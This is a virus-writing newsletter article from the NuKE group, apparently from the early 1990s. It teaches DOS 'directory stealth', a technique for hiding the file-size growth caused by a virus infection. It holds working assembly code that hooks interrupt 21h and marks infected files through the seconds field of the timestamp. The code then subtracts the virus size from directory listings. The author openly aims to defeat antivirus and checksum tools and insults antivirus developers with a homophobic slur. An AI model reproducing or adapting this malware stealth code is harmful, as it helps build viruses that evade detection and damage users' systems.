***************************** ** Directory Stealth ** ** ** ** By Rock Steady/NuKE ** ***************************** Stealth Viruses are the Viruses that I must admit Anti-Viral Queers Don't tend to like at all. Emagine if we added a Polymorphic feature into the Stealth Virus? But, if you want to Continue Writing Viruses you have to make them Stealth. MS-DOS Version 6.0 Now comes with Virus Scanners and CRC & Checksum Checkers. In order to stop many viruses, But it will NEVER stop the `Stealth' Virus that is SMART of those AV features! People think that there is ALOT of more INFECTED PCs since the virus threat, started in 1986-7. Even though in the beginning only 10 or so viruses were known, they Infected more systems, Compared to the viruses today, where we have about 1300 and growing. But the truth is LESS PCs are getting infect now, as people are now Virus Aware. With all the utilities out, any joker can stop and clean a virus in seconds. Come on, how many people MEMORIZED COMMAND.COM size? Out of my head its 47845 (MS-Dos V5.0). A simple increase of size tells me I got a problem. A simple Stealth Feature every virus MUST have is the DOS `Dir' Stealth feature. That will NOT show you the INCREASE of file size, when the virus infects it. I have played with a few routines as such. I have tried reducing the File size in the FAT area, which results in the famous CHKDSK error reports of Loss Sectors, or Cross Links... And fixing them with CHKDSK will result in damaging the file for good. What can we do? How about reducing the File size Right AFTER its read by DOS or any Utilities and right BEFORE its display on the screen! Yeah that's an Idea, Here's how to go about it... %Theory% ~~~~~~~~ First we must HOOK Int 21h, as every time a `DIR' is done, Int 21h function 11h & 12h is called! If you don't know how to Hook Interrupts Read RESIDENT VIRIIs Article in this NewsLetter. Int21_Handler: cmp ah,11h ;Is a DOS `Dir' being done? je dir_stealth ;Yes, Jump to `DIR_STEALTH' cmp ah,12h ;Is a DOR `Dir' Being done? je dir_stealth ;Yes, Jump to `DIR_STEALTH' Int21Call: jmp dword ptr cs:[Int21] ;Or Else Goto ORIGINAL Int 21h ret ;Is need for the CALL of below That's all that is needed in your Int21_Handler. Ofcourse if you are infecting file that are being Execute you add it ABOVE! Anyhow lets Explain the `DIR_STEALTH' Offset Size Description DDDDEDDDDDEDDDDDDD[Normal FCB]DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 00h 3 1 3 Drive Number 00=current drive 01=A,02=B,03=C etc.. 01h 3 8 3 Filename. Unused Spaces padded with Blanks 09h 3 3 3 Extension of Filename. 0Ch 3 2 3 Current block. points to block of records 0Eh 3 2 3 Record Size. 10h 3 4 3 FileSize in Bytes. (Low-order first, then high-order) 14h 3 2 3 Date of Last Write. YY-MM-DD into bits YYYY-YYYM-MMMD-DDDD 16h 3 2 3 Time of Last Write. HH:MM:SS into bits HHHH-HMMM-MMMS-SSSS 18h 3 4 3 Reserved *1Ch 3 4 3 SAME `10h' but THIS FILESIZE gets printed on Screen! 20h 3 1 3 Offset of current record 21h 3 4 3 Relative Record * = Field Changed by virus. Extended FCB: Are Identical to the Normal FCB but, it has three new ~~~~~~~~~~~~ fields totalling 7 bytes. (That is why we add y to BX) The additional 7 bytes are added to the BEGINNING! Offset Size Description DDDDEDDDDDEDDDDDDD[Extended FCB]DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD -07h 3 1 3 ALWAYS FFh tells use this is an Extended FCB -06h 3 5 3 Reserved for DOS -01h 3 1 3 Attribute Byte So if we have an Extended FCB the first Byte will be FFh simply INC it and if its ZERO you got a Extended FCB! You can also CMP ES:[BX],FFh but that takes too many Bytes! Be COMPACT!!! %Algorithms% ~~~~~~~~~~~~ CONDISTION: After calling Function 11h/12h (Int 21h) it will search with the contents in the FCB. (*.*) which the DS:DX registers point to the FCB. If successful it will DUPLICATE the specified of the FCB in the current DTA (Disk Transfer Area) And basically we will EDIT the info in the DTA! NOTE: Just because we are using the DTA doesn't mean this will work for function 4Eh/4Fh (Int 21h) that uses the DTA and ASCIIZ strings to search, that is a different procedure, though somewhat the same as this one. See Method #2, for that. Step 1. We call the Int 21h so we may have the results to play with BEFORE DOS displays them on screen. Step 2. Get the Current PSP, As the FCB is located inside the PSP in COM files its CS:0000 - CS:00FF. But in EXEs it can be any- where, Int21h/AH=51 (Undocemented) will do this for us. Step 3. Unmask the seconds (see if its infected) Quit if NOT Step 4. Get the current DTA Step 5. Test if it is Either an Extended FCB or Normal! If Extended Simple add 7h to the Address. (As Extended only have 7 bytes extra in the begining) Step 6. Minus File size from the DTA! & Restore Time Back ; Here it is... Method #1 dir_stealth: pushf ;Fake an INT Call push cs ;Needed to return back HERE! (Virus) call Int21Call ;Call the interrupt (See `Int21_Handler') test al,al ;AL=00h if successful jnz no_good ;Not Successful. Errors Eg:No More Files push ax push bx ;Save them since they will be used! So when push es ;We exit all is restored to as Before! mov ah,51h ;(Undocmented) Gets the Current PSP and puts int 21h ;it into BX mov es,bx ;ES now has PSP segment Address cmp bx,es:[16h] ;Did we open a Good PSP? jnz exit_man ;No, PSP unavailable, Exit Dude mov bx,dx ;BX now points to the Original FCB in PSP mov al,[bx] ;AL now has the current drive push ax ;Save it to tell if its an Extended FCB mov ah,2fh ;Get DTA (Disk Transfer Address) int 21h ;Also before we start fiddling around we must know if we are working with ;And EXTENDED FCB or the Normal FCB, or else Major Problems! The Extended ;Has three fields appended to the normal one... (Above) pop ax ; AL = FFh if Extended FCB or else Drive # inc al ; Will tell us if we have an Extended FCB jnz fcb_ok ; No, We don't continue as normal add bx,7h ; Yes, we do, add 7h to BX pointer fcb_ok: mov ax,es:[bx+17h] ;Gets Seconds Field and ax,1fh ;Unmask to have SECONDS only xor al,1dh ;is it 58 seconds? (1d * 2) jnz not_infected ;Nope, okay its not infected and byte ptr es:[bx+17h],0e0h ;Restores seconds sub es:[bx+1dh],virus_size ;Subtract FileSize with Virii sbb es:[bx+1fh],ax ;Needed to fix up Bytes with not_infected: ;Borrowing pop es ;Ciao, Ciao pop bx pop ax no_good:iret ;Pretend you came back from an Interrupt call! ;----------------------------The EnD------------------------------------- Rock Steady / NuKE `Feed my Frankenstein', Alice Cooper NOTE: This Code Works, Look at NuKE PoX V1.1 to see it...